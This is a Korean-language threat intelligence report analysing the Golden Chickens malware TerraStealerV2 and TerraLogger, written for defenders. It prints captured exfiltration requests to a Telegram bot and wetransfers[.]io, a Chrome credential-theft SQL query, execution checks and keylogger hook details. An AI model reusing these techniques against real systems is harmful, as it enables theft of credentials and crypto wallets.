TerraStealerV2 및 TerraLogger: Golden Chickens의 새로운 멀웨어 계열 발견

Executive Summary

Insikt Group은 금전적 동기를 가진 위협 행위자인 Golden Chickens(Venom Spider라고도 함)와 관련된 두 개의 새로운 멀웨어 계열, TerraStealerV2와 TerraLogger를 식별했습니다. Golden Chickens는 FIN 6, Cobalt Group 및 Evilnum과 같은 사이버 범죄 그룹이 사용하는 서비스형 멀웨어(MaaS) 플랫폼을 운영하는 것으로 알려져 있습니다. 2025년 1월부터 4월 사이에 관찰된 새로운 계열은 자격 증명 탈취 및 키로깅을 목표로 한 개발이 계속되고 있음을 시사합니다.

TerraStealerV2는 브라우저 자격 증명, 암호화폐 지갑 데이터, 브라우저 확장 정보를 수집하도록 설계되었습니다. Chrome “로그인 데이터” 데이터베이스를 대상으로 자격 증명을 도용하지만, 2024년 7월 이후 Chrome 업데이트에서 도입된 ABE(애플리케이션 바운드 암호화) 보호를 우회하지 않습니다. 이는 멀웨어 코드가 오래되었거나 아직 개발 중임을 나타냅니다. 데이터는 Telegram과 wetransfers[.]io 도메인 모두로 유출됩니다. 스틸러는 LNK, MSI, DLL, EXE 파일 등 여러 형식을 통해 배포되는 것이 관찰되었으며, regsvr32.exe 및 mshta.exe와 같은 신뢰할 수 있는 Windows 유틸리티를 활용하여 탐지를 회피합니다.

반면 TerraLogger는 독립형 키로거입니다. 일반적인 저수준 키보드 훅을 사용하여 키 입력을 기록하고 로그를 로컬 파일에 저장합니다. 그러나 데이터 유출이나 명령 및 제어(C2) 통신 기능은 포함되어 있지 않으며, 이는 개발 초기 단계에 있거나 Golden Chickens MaaS 생태계의 모듈형 부분으로 의도되었음을 나타냅니다.

TerraStealerV2 및 TerraLogger의 현재 상태는 두 도구 모두 활발히 개발 중임을 보여주며, 대체로 성숙한 Golden Chickens 도구와 연관된 스텔스 수준을 나타내지는 않고 있습니다. Golden Chickens가 자격 증명 탈취 및 액세스 작전을 위한 멀웨어를 개발해 온 이력을 고려할 때, 이러한 기능은 계속 진화할 가능성이 높습니다. 조직에서는 이 보고서에서 제공된 완화 지침에 따라 멀웨어 계열의 성숙에 대비해 침해 위험을 줄여야 합니다.

주요 연구 결과

• Insikt Group은 Golden Chickens 위협 행위자와 연관된 두 개의 새로운 멀웨어 계열인 TerraStealerV2와 TerraLogger를 식별했습니다. TerraStealerV2는 브라우저 자격 증명을 탈취하고 암호화폐 지갑을 표적으로 삼을 수 있으며, TerraLogger는 독립형 키로거 모듈로 작동합니다.
• TerraLogger는 Golden Chickens가 개발한 멀웨어에서 처음으로 관찰된 키로깅 기능입니다.
• TerraStealerV2는 Chrome ABE로 보호된 자격 증명 해독을 지원하지 않으며, 이는 이 도구가 오래되었거나 아직 개발 중임을 나타냅니다.
• Insikt Group은 2025년 1월부터 3월까지 MSI, DLL 및 LNK 파일을 포함하여 다양한 전달 방법을 사용한 10개의 고유한 TerraStealerV2 배포 샘플을 관찰했습니다.

배경

Golden Chickens는 Venom Spider라는 가명으로도 추적되며, 금전적 동기를 가진 사이버 위협 행위자로서 MaaS 모델에서 은밀하고 모듈화된 멀웨어 계열을 운영하는 것으로 알려져 있습니다. 적어도 2018년부터 Golden Chickens MaaS 계열은 소셜 엔지니어링 벡터를 통해 고부가가치 조직을 대상으로 하는 캠페인에 배포되어 왔으며, 가짜 구인 제안이나 이력서를 활용한 스피어피싱 캠페인에 사용되었습니다. 특히 이 멀웨어는 러시아에 본사를 둔 FIN6 및 Cobalt Group을 비롯한 최상위 사이버 범죄 단체들과 벨라루스에 본사를 둔 Evilnum에서 사용됩니다. Evilnum은 전 세계적으로 발생한 15억 달러 이상의 피해와 연결되어 있습니다.

Golden Chickens MaaS 계열의 핵심 구성 요소는 VenomLNK와 TerraLoader입니다. 초기 감염은 일반적으로 악성 Windows 바로 가기 파일인 VenomLNK를 통해 이루어집니다. 이 파일은 추가 Golden Chickens 멀웨어 배포를 담당하는 로더 모듈인 TerraLoader를 실행합니다. 이 모듈에는 자격 증명 수집을 위한 TerraStealer, TeamViewer 하이재킹을 위한 TerraTV, 랜섬웨어 배포를 위한 TerraCrypt가 포함됩니다. 아래 그림 1에 표시된 바와 같이, 정찰을 위한 TerraRecon, 데이터 삭제용 TerraWiper, lite_more_eggs 등이 Golden Chickens 생태계에 속하는 추가 멀웨어 계열입니다.

그림 1: 이전에 보고된 Golden Chickens 멀웨어 계열(출처: Quo Intelligence)

eSentire Threat Response Unit의 공격자 식별 작업 결과, Golden Chickens는 몰도바와 캐나다 몬트리올에서 개인이 공동으로 운영하는 것으로 여겨지는 badbullzvenom이라는 위협 행위자와 연결된 것으로 확인되었습니다. 위협 행위자의 개발 이력을 보면 낮은 수준의 포럼 참여자에서 확립된 MaaS 제공업체로 발전했음을 알 수 있습니다. Golden Chickens가 개발한 도구는 British Airways, Newegg 및 Ticketmaster UK에 대한 고위험 공격을 포함하여 여러 캠페인에서 무기화되었습니다.

2024년 8월과 10월 사이에 Zscaler ThreatLabz는 Golden Chickens 그룹의 소행으로 추정되는 활동이 재개된 것을 관찰했으며, 여기에는 새로 식별된 두 가지 멀웨어 계열인 RevC2 및 Venom Loader의 배포가 사용됩니다. 이러한 도구는 암호화폐 결제 요청 및 소프트웨어 API 문서와 같은 사회 공학적 유인을 활용하여 VenomLNK 캠페인을 통해 전달되었습니다. 그림 2는 RevC2를 전달하는 데 사용된 공격 체인을 보여줍니다.

그림 2: RevC2를 전달하기 위해 사용된 최근 Golden Chickens 공격 체인(출처: ZScaler)

초기 전달 벡터는 알려지지 않았지만, 감염 시퀀스는 VenomLNK 파일 실행으로 시작됩니다. 이 파일은 유인 테마(이 경우 소프트웨어 API 문서)와 일치하는 미끼 이미지를 다운로드하고 RevC2 실행을 시작합니다. 특히 LNK 파일은 wmic.exe를 활용하여 regsvr32.exe를 호출하며, 이는 원격 네트워크 공유에서 호스팅된 악성 OCX 페이로드를 로드합니다.

기술 분석

Insikt Group은 Golden Chickens 위협 행위자 그룹에 의한 소행으로 추정되는 두 개의 새로운 멀웨어 계열을 식별했습니다. TerraStealerV2로 추적되는 첫 번째는 주로 브라우저 자격 증명, 암호화폐 지갑, 브라우저 확장 프로그램을 노리는 정보 탈취 프로그램입니다. 두 번째는 TerraLogger로 추적되는 키로거로, 독립형 모듈로 관찰되었습니다. 다음 하위 섹션에서는 각 멀웨어 계열에 대한 자세한 기술 분석을 제공합니다.

TerraStealerV2

Insikt Group은 최근 2025년 3월 3일 Recorded Future Malware Intelligence에 업로드된 Golden Chickens에 의한 새로운 스틸러를 식별했습니다. 샘플에 포함된 프로그램 데이터베이스(PDB) 경로(그림 3 참조)에 따르면 위협 행위자는 멀웨어를 NOK로 지칭하지만, Insikt Group은 이를 TerraStealerV2로 추적합니다.

스틸러는 OCX 파일로 전달되어 regsvr32.exe를 통해 실행되도록 되어 있습니다. 이는 DllRegisterServer 내보내기 함수를 호출합니다. 실행 시 DllRegisterServer는 제공된 파일에 .ocx 확장자가 있고 파일 이름이 하드코딩된 특정 문자나 숫자(예: 0.ocx)로 끝나는지 먼저 확인합니다. 그런 다음 아래 그림 4에 설명된 대로 파일이 regsvr32.exe에 의해 실행되고 있는지 확인한 후 계속 진행합니다.

그림 4 : TerraStealerV2의 분석 방지 검사를 보여주는 순서도(출처: Recorded Future)

그 후 멀웨어는 하드코딩된 키를 사용하여 XOR 디코딩 루틴으로 문자열 난독화 해제를 수행합니다. GetUserNameA 및 GetComputerNameA를 호출함으로써 로컬 사용자 및 시스템 이름을 검색하여 기본 호스트 정보를 수집합니다. 그런 다음 ifconfig[.]me에 HTTP 요청을 보내 피해자의 IP 주소를 확인합니다. 수집된 데이터는 이후 그림 5와 같이 Telegram 메시징 플랫폼을 통해 "NoterdanssBot"과 연결된 봇 토큰을 사용하여 "Noterdam"이라는 채널로 유출됩니다.

POST /< redacted >/sendMessage?chat_id=-4652754121 HTTP/1.1
Host: api.telegram.org
Accept: */*
Content-Length: 24014
Content-Type: application/x-www-form-urlencoded

chat_id=-4652754121&text=%2A%2ANew%20User%20Ran%20the%20Application%2A%2A%0A%2A%2AUsername%3A%2A%2A%20Admin%0A%2A%2APC%20Name%3A%2A%2A%20UUHJKMQK%0A%2A%2AIP%20Address%3A%2A%2A%20%3C%21DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en%22%3E%0A%0A%3Chead%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3DUTF-8%22%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22content-style-type%22%20content%3D%22text%2Fcss%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22content-script-type%22%20content%3D%22text%2Fjavascript%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22content-language%22%20content%3D%22en%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22pragma%22%20content%3D%22no-cache%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22cache-control%22%20content%3D%22no-cache%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20name%3D%22description%22%20content%3D%22Get%20my%20IP%20Address%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20name%3D%22keywords%22%20content%3D%22ip%20address%20ifconfig%20ifconfig.me%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20name%3D%22author%22%20content%3D%22%22%20%2F%3E%0A%20%20%20%20%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22favicon.ico%22%20%2F%3E%0A%20%20%20%20%3Clink%20rel%3D%22canonical%22%20href%3D%22https%3A%2F%2Fifconfig.me%2F%22%20%2F%3E%0A%20%20%20%20%3Ctitle%3EWhat%20Is%20My%20IP%20Address%3F%20-%20ifconfig.me%3C%2Ftitle%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2C%20initial-scale%3D1%22%3E%0A%20%20%20%20%3Clink%20href%3D%22.%2Fstatic%2Fstyles%2Fstyle.css%22%20rel%3D%22stylesheet%22%20type%3D%22text%2Fcss%22%3E%0A%20%20%20%20%3Clink%20href%3D%22https%3A%2F%2Ffonts.googleapis.com%2Fcss%3Ffa
      

메시지의 POST 데이터에 대한 URL 디코딩을 보면 위협 행위자가 Telegram 채널로 구조화된 알림을 보낸다는 것이 확인됩니다. 그림 6에 표시된 알림에는 새 사용자가 애플리케이션을 실행했음을 나타내는 경고, 수집된 사용자 이름 및 시스템 이름, ifconfig[.]me 요청의 원시 HTML 응답이 포함되어 있습니다.

**New User Ran the Application**
**Username:** Admin
**PC Name:** UUHJKMQK
**IP Address:** <!DOCTYPE html>
<html lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="content-style-type" content="text/css" />
    <meta http-equiv="content-script-type" content="text/javascript" />
    <meta http-equiv="content-language" content="en" />
    <meta http-equiv="pragma" content="no-cache" />
    <meta http-equiv="cache-control" content="no-cache" />
    <meta name="description" content="Get my IP Address" />
      

그런 다음 멀웨어는 활성 프로세스를 나열하고 chrome.exe의 인스턴스를 검색합니다. 감지되면 TerminateProcess Windows API를 사용하여 프로세스 종료를 시도합니다. 이 동작은 Chrome의 브라우저 데이터베이스 파일에 대한 파일 잠금을 해제하여 데이터 추출 중에 방해받지 않고 액세스할 수 있도록 의도된 것일 가능성이 높습니다. 그 후, 멀웨어는 Chrome에서 저장된 자격 증명 및 기타 민감한 데이터를 추출하려고 시도하며, 특정 암호화폐 지갑과 브라우저 확장 프로그램을 표적으로 삼습니다.

Chrome 브라우저 데이터베이스 탈취 구현 방식은 "로그인 데이터" 데이터베이스를 C:ProgramData\Temp\LoginData에 복사한 후, 정적으로 연결된 SQLite 라이브러리로 저장된 로그인을 추출하여 SELECT origin_url, username_value, password_value FROM logins SQL 쿼리를 실행합니다. TerraStealerV2는 SQLite 버전 3.46.0을 사용합니다. RevC2에 정적으로 연결된 동일한 버전으로, 코드를 재사용하거나 공유 개발 방식을 사용하는 것일 수 있습니다. 그러나 이 구현은 Chrome의 ABE를 우회하지 않기 때문에, 2024년 7월 24일 이후 업데이트된 Chrome 기반 브라우저를 사용하는 호스트에서는 수집된 비밀번호가 해독되지 않습니다. 이러한 제한이 있다는 것은 탈취자 코드가 오래되었거나 아직 개발 중임을 의미합니다. 효과적인 탈취자는 일반적으로 최신 버전의 Chrome 또는 Microsoft Edge에서 해독된 자격 증명을 추출하기 위해 ABE 우회 기술을 통합하기 때문입니다.

유출된 브라우저 로그인 데이터와 정보 메시지는 C:\ProgramData\file.txt에 기록되고, 도용 작업이 완료되면 %LOCALAPPDATA%\Packages\Bay0NsQIzx\p.txt에 복사됩니다. 발견 시, 대상 브라우저 확장 프로그램과 지갑의 디렉터리가 %LOCALAPPDATA%\Packages\Bay0NsQIzx에 복사되며, 발견된 암호화폐 지갑의 수를 알리는 Telegram 메시지가 전송됩니다. 이후에 %LOCALAPPDATA%\Packages\Bay0NsQIzx의 내용은 output.zip이라는 아카이브로 압축되어 같은 디렉터리에 위치하게 됩니다. 그 후 아카이브는 Telegram 봇과 wetransfers[.]io/uplo.php에서 호스팅된 보조 C2 엔드포인트로 유출됩니다. 이는 그림 7에 나와 있습니다. wetransfers[.]io 도메인은 2025년 2월 18일 NameCheap, Inc.를 통해 등록되었으며 현재 Cloudflare 인프라 뒤에서 호스팅되고 있습니다.

POST /uplo.php HTTP/1.1
Host: wetransfers.io
Accept: */*
Content-Length: 11252
Content-Type: multipart/form-data; boundary=------------------------rUxSmqCNbtGx4auL8M41nl

--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="zipFile"; filename="output.zip"
Content-Type: application/octet-stream

PK........3.dZ...')...).......p.txt2025-03-04 21:33:38 - Total Browsers  2
PK..?.......3.dZ...')...).....................p.txtPK..........3...L.....
--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="pcname"

UUHJKMQK
--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="username"

Admin
--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="totalwallets"

0
--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="ip"

<!DOCTYPE html>
<html lang="en">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta http-equiv="content-style-type" content="text/css" />
   <meta http-equiv="content-script-type" content="text/javascript" />
   <meta http-equiv="content-language" content="en" />
   <meta http-equiv="pragma" content="no-cache" />
   <meta http-equiv="cache-control" content="no-cache" />
   <meta name="description" content="Get my IP Address" />
   <meta name="keywords" content="ip address ifconfig ifconfig.me" />

배포

Insikt Group은 실행 파일(EXE), 동적 연결 라이브러리(DLL), Windows Installer 패키지(MSI) 및 바로 가기(LNK) 파일을 포함하여 TerraStealerV2 배포에 사용된 여러 전달 메커니즘을 식별했습니다. 관찰된 모든 사례에서 TerraStealerV2 OCX 페이로드는 URL wetransfers[.]io/v.php, 즉 데이터 유출에 활용되는 동일한 도메인에서 호스팅되는 리소스에서 curl 또는 PowerShell을 사용하여 검색된 후, regsvr32.exe를 통해 실행됩니다(그림 8 참조).

그림 8: TerraStealerV2 배포 샘플 공격 체인(출처: Recorded Future)

표 1에는 파일 이름, 컴파일 타임스탬프 및 Golden Chickens가 배포하는 것으로 관찰된 TerraStealerV2 페이로드가 포함된 배포 샘플이 나열되어 있습니다. 하나의 LNK 파일(SHA-256: 9aed0eda60e4e1138be5d6d8d0280343a3cf6b30d39a704b2d00503261adbe2a)이 ClickFix로 추적되는 활동 클러스터와 겹치는 것으로 보입니다. 이 경우 LNK 파일은 MP4 파일로 위장한 페이로드를 심었으며, 이는 mshta.exe를 통해 실행되었습니다. 이 기술은 ClickFix 캠페인에서 이전에 관찰된 전술과 일치합니다.

표 1: TerraStealerV2 배포에 사용된 샘플(출처: Recorded Future)

TerraLogger

Insikt Group은 2025년 1월 13일에 Recorded Future Malware Intelligence에 업로드된 Golden Chickens와 관련된 새로운 키로거를 확인했습니다. Insikt Group은 이 그룹을 TerraLogger로 추적하며, 5개의 독특한 샘플을 식별했습니다. 아래 그림 9에 표시된 바와 같이, 4개의 샘플은 의도한 대로 작동하며 동일한 PDB 문자열을 포함합니다. 나머지 샘플은 이 PDB 문자열을 포함하지 않으며, 대신 TerraStealerV2와 동일한 PDB 경로를 사용합니다(위 그림 3 참조). 이 이상값은 개발자 테스트로 보이며, TerraStealerV2와 동일한 문자열 인코딩 방법을 사용합니다. 그러나 키로거 관련 문자열을 초기화하는 동안 충돌이 발생하여 실행 중에 실패하고, 이로 인해 멀웨어가 주요 진입 지점에 도달하지 못합니다.

C:\Users\PC\Downloads\Projector\Projector\x64\Release\Projector.pdb

TerraLogger는 일반적으로 OCX 파일로 제공되며 TerraStealerV2와 동일한 초기 실행 검사를 수행합니다. regsvr32.exe를 통해 실행되도록 의도되었으며 이는 DllRegisterServer 내보내기 함수를 호출합니다. 실행 시 제공된 파일에 .ocx 확장자가 있고 파일 이름이 하드 코딩된 문자 또는 숫자(예: 0.ocx)로 끝나는지 먼저 확인합니다. 그런 다음 regsvr32.exe에 의해 실행되고 있는지 확인한 후 계속 진행합니다. 초기 실행 검사가 통과되면 TerraLogger는 파일 핸들을 열어 키 입력을 기록합니다.

Insikt Group은 5개의 확인된 샘플에서 여러 파일 경로를 식별했으며, C:\ProgramData 폴더에 위치한 a.txt, f.txt, op.txt 또는 save.txt 등의 파일에 로그가 기록되는 것을 확인했습니다. 이 멀웨어는 SetWindowsHookExA로 WH_KEYBOARD_LL 훅을 설치함으로써 일반적으로 관찰되는 기법을 통해 키로거를 구현하며, fn 콜백 함수(그림 10 참조)를 등록하여 메시지 이벤트를 가로채고 처리함으로써 키보드 활동을 캡처할 수 있도록 합니다.

그림 10: 키로거 콜백 함수(출처: Recorded Future)

키 입력은 mw_log_key 함수 내의 열린 로그 파일에 기록됩니다. 이 함수는 먼저 현재 전경 창의 제목을 가져온 다음, 가로챈 키 입력 앞에 줄 바꿈 기호를 추가합니다. 세미콜론, 괄호, 따옴표와 같은 특수 문자를 처리하는 로직이 포함되어 있으며, Shift 키의 상태를 확인하여 기록할 올바른 문자를 결정합니다. 키코드가 알려진 특수 키와 일치하지 않으면 <KEY-[keycode]> 형식으로 기록됩니다. 결과 로그 파일의 예가 그림 11에 나와 있습니다.

그림 11: 키로거 로그 파일 예시(출처: Recorded Future)

표 2에는 확인된 5개의 TerraLogger 키로거 샘플이 정리되고 버전별 차이점이 요약되어 있습니다. 컴파일 타임스탬프는 첫 번째 버전이 2025년 1월 13일에 빌드되었으며, 가장 최근 샘플이 2025년 4월 1일에 컴파일되었음을 나타냅니다. 이 샘플들에는 점진적인 마이너 업데이트가 반영되어 있으며, 활발한 개발이 진행 중임을 시사합니다. 주요 변경 사항으로는 키 입력 로그를 저장하는 파일 경로가 수정되고 특수 키의 표현 방식이 꺾쇠 괄호와 대문자 토큰(예: , )에서 파이프로 구분된 소문자 약어(예: |bck|, |sft|)로 변경된 것이 있습니다.